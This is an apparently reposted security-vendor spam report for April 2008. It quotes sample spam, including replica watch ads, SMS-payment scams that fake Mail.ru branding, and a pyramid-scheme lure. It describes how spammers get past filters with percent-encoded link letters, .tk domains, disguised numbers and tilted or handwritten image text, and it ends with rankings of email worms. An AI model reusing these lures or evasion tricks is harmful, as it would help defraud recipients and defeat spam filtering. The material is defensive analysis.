Guarantee: original – 24 months, replica – 18 months.
Convenient purchase: original – 2 boutiques in Moscow, Russia. Replica – free delivery to any town in Russia (CIS).
External appearance: replica is 100% identical to the original!
See here {LINK}
Tel. 8-800-2000-720 (free calls from Russia).
There are also more than 189 watches of famous international brands at the Internet store {LINK}
Rado (from 299 euros), Rolex (from 325 euros), Omega (from 242 euros), Vacheron Constantin (up to 1749 euros), Breguet (from 449 euros), Cartier (from 229 euros)!
юмфм фдтхю вг фла ц аа дбцяа щгд
эвх дажжд гюбч тцмяг
ыу црфщи жеюпу г шж б рояшь ц
ияфп зш э новкп
сюшшо м бшв р угещь
ьвл тгжну зштив хвцвл
у лош дфвыя прв илл
SMS fraud
More and more spam with offers to pay for goods and services via SMS messages sent to short numbers is appearing on the Russian Internet. Even if the spam message states that the SMS is free of charge, it doesn’t mean it actually is. There is also no guarantee that the user will get what he wanted and that his money won’t just end up lining the pocket of a cybercriminal.
Spammers continue to use Mail.ru logos to make their messages look more respectable. The message below deliberately promotes a dating service because it entails further communication and new contacts. These types of messages usually include an attractive photo, and only mention further down the page that you have to pay to communicate. The very fact that the service is not free should arouse suspicion.
Вам оставлено сообщение на мобильном портале Mail.ru, пользователем <Виктория SexyGirl>
Для прочтения сообщения, отправьте смс со словом tt456734 на номер 4449
Услуга доступна для жителей РФ и граждан СНГ, стоимость услуги 0.3$ + НДС)
Сообщение отправлено 26.04.2008
Спасибо за то, что Вы являетесь пользователем Mail.Ru.
С уважением, администрация Mail.Ru (1518450363)
Translation:
Znakomstva@mail.ru
You have got a message on mail.ru from
To read the message send an SMS with the text tt456734 to 4449 (the service is available in the Russian Federation and CIS, the charge is $0.3 including VAT)
The message was sent on April 26, 2008
Thank you for using mail.ru
Administration of mail.ru (1518450363)
Today, even the financial pyramid schemes that used to offer the opportunity of huge online earnings only send out information after receiving an SMS message. For the cost of an outgoing message (5 rubles, or about 20 cents) the user contributes to a business named MLM. It goes without saying that a spammer who promises the recipient “earnings” with no initial investment can hardly be trusted.
посмотри не пожалеешь
Отправьте на номер 7030 SMS следующего содержания: код+25558 Стоимость отправки сообщения в рублях: 5 В ответ вы получите ссылку на сайт с заработком,без вложений, и практически без вашего участия.
Translation:
This is worth seeing
Send an SMS message to 7030 with the code +25558. An SMS message costs 5 rubles. In return you will get a link to the site containing information on how to get money without any investments and with minimal participation. End of translation.
Solutions from spammers: protecting against viruses and spam
On the eve of the 30th anniversary marking the first spam message sent via email, users were being offered equipment not only for sending spam but also to protect against it.
Sympathetic-sounding mass mailings with the theme “Tired of spam? Call us!!!” promoted nothing other than anti-spam and antivirus products from the German company Avira. It is unclear whether this was just another case of black PR, or the Russian representatives of Avira using unorthodox methods to advertise the services of Avira’s dealers in Russia.
In April, Russian-language spam promoting anti-virus products added to the usual English-language advertisements for very cheap software. The main difference was that the Russian-language spam was offering the programs for free.
Users should be particularly careful when downloading “antivirus” files from unknown sources, because they may turn out to be malicious programs.
Kaspersky Key 5 6 7 Ключ Касперский 5 6 7
Ключ Касперский 5 до 9_03_2010 бесплатно
Ключ Касперский 6 до 11_03_2010 бесплатно
Ключ Касперский 7 бесплатно
специально для ХХХХХХХХХХХХХХ
на {site}
Kaspersky 5 Key do 9_03_2010 Besplatno
Kaspersky 6 Key do 11_03_2010 Besplatno
Kaspersky 7 Key Besplatno
spetsial'no dlya ХХХХХХХХХХХХХХХ na {site}
If earlier spammers offered the option of unsubscribing from unsolicited mailings, the latest trick is the option of unsubscribing by phone. This method is hardly likely to eradicate spam, and if anything will ensure it continues: by phoning, a user is merely confirming an email account is active and ensures that the address remains in illegitimate mailing databases.
We help you to launch your business
Legal company “Consultant” offers the following types of legal services:
Registration of LLC, CJSC, OJSC
Registration of individual business
Registration of equity issue
Legal addresses
Registration of non-commercial organizations
Amendments to constitutive documents
Copies of extracts from the Uniform State Register of Enterprises and Organizations
Consultation on stockholder rights
On demand drafts of constitutive documents
Holding of stockholder meetings
Corporate disputes
Major transaction support
Legal entity dissolution
Bookkeeping assistance
Drafting and expertise of all types of civil documents
Special offer: preparation of documents to be presented in internal revenue service – 1500 rub.
Discount for complex order!
Contact information (495) 951-32-05 783-72-66
If you opened this e-mail, you may need legal advice. If you opened this e-mail by chance and you do not need any legal assistance, please, delete this message. You can unsubscribe from mass mailings by calling 951-32-05 and stating your e-mail address.
Spammer methods and tricks
In order to bypass filtration systems, spammers are willing to modify texts to such an extent that they become unreadable. The flow of spam in April was marked by a wave of messages containing heavily disguised telephone numbers. As seen from the example below, the figures are interspersed with letters, which change from message to message. This method did not gain popularity, however, because only those really interested in the topic would be patient enough to work out the exact telephone number. By the end of the month the technique had already disappeared from the flow of spam.
Английский язык.
Уроки с автором методики
Вы сможете даже думать на английском языке (правда, если будете к этому серьезно относиться) Поймете грамматику. Не думайте, что у вас «тяжелый случай». Начните заниматься. Преподаватель может выехать к вам.
Один академический час стоит – 90$ (45 минут) У вас есть возможность получить бесплатную консультацию. (495) xxx-xx-xx
Translation:
English.
Lessons with methodologist
You can even think in English (if you really make an effort) Understand grammar. No need to think you’re a hopeless case! Start learning. A teacher can come to you. One academic hour costs $90 (45 minutes) You can get a free consultation.
(495) xxx-xx-xx
One new method of obfuscating text is to replace random letters in links with special UTF codes. Each letter in the UTF code corresponds to a certain set of symbols. When sending messages containing one and the same link, spammers replace different letters with codes in each individual message. Because spam filters work with the original message, they do not recognize the link and, subsequently, that the messages belong to the same mass mailing. A mail client then coverts the codes into the corresponding letters meaning the user never notices any of the changes made.
How the original message looks
Summer is coming and it will soon be time to head to the beach.
It’s the perfect time to lose those extra kilos. How are you going to do it? I, personally, am not going to go on a diet or start exercising. There is an easier and quicker method for lazy people like you and me. Check out this site for information and photos http://e%73g%78uvj.info
The message that the recipient sees
Summer is coming and it will soon be time to head to the beach.
It’s the perfect time to lose those extra kilos. How are you going to do it? I, personally, am not going to go on a diet or start exercising. There is an easier and quicker method for lazy people like you and me. Check out this site for information and photos http://esgxuvj.info/
Russian-language mailings advertising sites in the .tk domain zone, which belongs to Tokelau, have resumed. Spammers use this free registration zone to create a large number of duplicate pages, thus increasing the chances of evading anti-spam systems.
любви для тебя больше нет. Умерла она, твоя любовь. А вместо нее дадена тебе соляные фактории, а по берегам темных, глубоких речек, по большей части http://KNEWMYNAME.TK
Приезжали посмотреть на наши чудеса из столиц и иных краев, хотели и в черную дыру, смотревшую ему прямо в переносицу. Сухо щелкнул курок, потом http://KIRKUSH.TK
Two links that lead to the same Russian-language site selling DVDs of popular films which have been re-dubbed with humorous voiceovers.
April once again saw spammers sending pictures that contained text positioned at various angles (see below), which was meant to prevent such images from being detected.
In a variation of this technique, spammers also sent several mass mailings containing pictures with handwritten text in an attempt to bypass spam detectors.
An image with a handwritten message offering an SMS message service that allows the sender’s number to be masked, making the message look as though it is from another number.
In the first instance it is easy to read the text of the message, though the second picture may pose problems not only for spam filters but also those not used to reading handwriting.
Conclusion
With the approach of the summer holiday season, the amount of spam in mail traffic is declining, and the trend looks set to continue into the summer. However, the fact that spammers are continuing to search for new technologies that bypass anti-spam filters suggests that it will only be a seasonal decline. Moreover, the criminal element in spam is becoming more prevalent, which in turn attracts those who want to profit illegally and further contributes to the criminalization of spam. Unfortunately, the chances of spammers calling a “ceasefire” or “capitulating” in the war on spam are highly unlikely.
Recent trends
The amount of spam in mail traffic fell compared to March’s (http://www.viruslist.com/en/analysis?pubid=204792004) figure and averaged 86.2%.
0.76% of messages contained malicious files and links to infected web sites.
1.3% of messages contained links to phishing sites.
The amount of spam containing graphical attachments fell considerably compared to March’s figure and accounted for just 13% of spam.
The amount of unsolicited mass mailings containing offers to pay for services via SMS messages increased.
Spammers used special codes to mask messages.
Spam containing links to advertising sites in the .tk domain zone resumed
Top 20 Viruses for April 2008
Position Change in position Name Proactive Detection Flag Percentage
1. 0 Email-Worm.Win32.NetSky.q Trojan.generic 40.58
2. +1 Email-Worm.Win32.NetSky.d Trojan.generic 8.18
3. +6 Email-Worm.Win32.NetSky.y Trojan.generic 7.62
4. +3 Email-Worm.Win32.Bagle.gt Trojan.generic 6.64
5. +1 Email-Worm.Win32.Scano.gen Trojan.generic 6.47
6. +2 Email-Worm.Win32.NetSky.aa Trojan.generic 5.81
7. New! Trojan-Downloader.Win32.Agent.ica downloader 3.08
8. -5 Email-Worm.Win32.Nyxem.e Trojan.generic 3.01
9. New! Net-Worm.Win32.Mytob.x Worm.P2P.generic 2.94
10. New! Net-Worm.Win32.Mytob.r Worm.P2P.generic 2.68
11. -1 Email-Worm.Win32.Bagle.gen Trojan.generic 1.73
12. +3 Email-Worm.Win32.Scano.bn Trojan.generic 1.19
13. -2 Email-Worm.Win32.Mydoom.l Worm.P2P.generic 1.07
14. New! Net-Worm.Win32.Mytob.bk Worm.P2P.generic 0.91
15. -13 Email-Worm.Win32.Mydoom.m Trojan.generic 0.89
16. +1 Email-Worm.Win32.NetSky.c Trojan.generic 0.70
17. Return Net-Worm.Win32.Mytob.c Trojan.generic 0.69
18. 0 Email-Worm.Win32.NetSky.t Trojan.generic 0.62
19. New! Email-Worm.Win32.Bagle.dx Trojan.generic 0.47
20. New! Email-Worm.Win32.NetSky.ac Trojan.generic 0.47
Other Malicious Programs 4.06
In April 2008, malicious code in mail traffic underwent significant changes in comparison to the previous month. Net-Womr.Win32.Mytob.t and Email-Worm.Win32.Mydoom.m, which had been pushing their way to the top by jumping ten places last month suddenly appeared to run out of steam: one slid back down the rankings, while the other disappeared off the bottom of the table altogether. At the same time, new malicious programs appeared in the Top Twenty, something which didn't happen in March.
The most recent mass mailing of the Diehard Trojan took place in February, and it seems that the authors are taking a break from spreading their creation widely. Our suppositions in March that this Trojan might end up lying low, rather than actively attacking, seem to be borne out by the absence of the program from this month's Top Twenty.
Once again, it's worms that have been around for some time which are out in full strength, with a range of modifications of Email-Worm.Win32.Netsky taking up seven out of twenty places in the rankings. This could be seen as a certain measure of success for the virus writers, especially if you consider that these modifications made up almost 64% of all infected mail traffic in April.
Trojan-Downloader.Win32.Small.hsl, which appeared in February and which rose to fifth place, has disappeared, being replaced by Trojan-Downloader.Win32.Agent.ica. However, the displacement of one Trojan-Downloader program by another is mere coincidence: the two programs have nothing in common, being constructed in completely different ways and created using different versions of Microsoft Visual Studio.
Neither Zhelatin (a.k.a. the Storm Worm) nor Warezov, which vanished from the rankings in February, have returned. It seems their authors may have decided against spreading their creations by using email attachments.
Overall, the picture created by the April 2008 statistics once again confirms the fact that new malicious programs are not being sent as attachments to emails. This tried and tested method, which is very resource intensive (at least when carrying out the initial mass mailing) is mainly used by the veteran malicious programs – those with email worm functionality. It's only rarely that we see Trojan-Downloader programs that put in a brief appearance in the Top Twenty; this is probably the result of mass mailings being conducted by malicious users who are new to the scene.
Overall, malicious programs made up 0.95% of all mail traffic scanned by Kaspersky Lab systems in April 2008. Other malicious programs made up a certain percentage (4.06%) of all malicious code found in mail traffic, indicating that a number of other worms and Trojans are currently in active circulation.
The Top Twenty countries which acted as sources of infected emails in March are shown below:
Position Change Country Percentage
1 0 the US 18.50
2 +2 Korea, Republic of 9.99
3 +4 Spain 8.12
4 -2 China 5.30
5 +7 Poland 5.11
6 +3 France 4.99
7 +1 Brazil 4.28
8 -2 Germany 3.98
9 -4 UK 3.47
10 0 Italy 3.05
11 New! Israil 2.31
12 -9 India 2.25
13 -2 Japan 2.07
14 New! Argentine 1.63
15 0 Turkey 1.36
16 -2 Australia 1.16
17 +2 Netherlands 1.14
18 New! Rumania 1.11
19 -2 Canada 1.06
20 -7 Russia 0.97
Other countries 18.15
Summary:
Went up: Email-Worm.Win32.NetSky.d, Email-Worm.Win32.NetSky.y, Email-Worm.Win32.Bagle.gt, Email-Worm.Win32.Scano.gen, Email-Worm.Win32.NetSky.aa, Email-Worm.Win32.Scano.bn, Email-Worm.Win32.NetSky.c
Went down: Email-Worm.Win32.Nyxem.e, Email-Worm.Win32.Bagle.gen, Email-Worm.Win32.Mydoom.l, Email-Worm.Win32.Mydoom.m,
Re-entry: Net-Worm.Win32.Mytob.c
No change: Email-Worm.Win32.NetSky.q, Email-Worm.Win32.NetSky.t
Saturday, June 7, 2008
Subscribe to:
Post Comments (Atom)
0 comments:
Post a Comment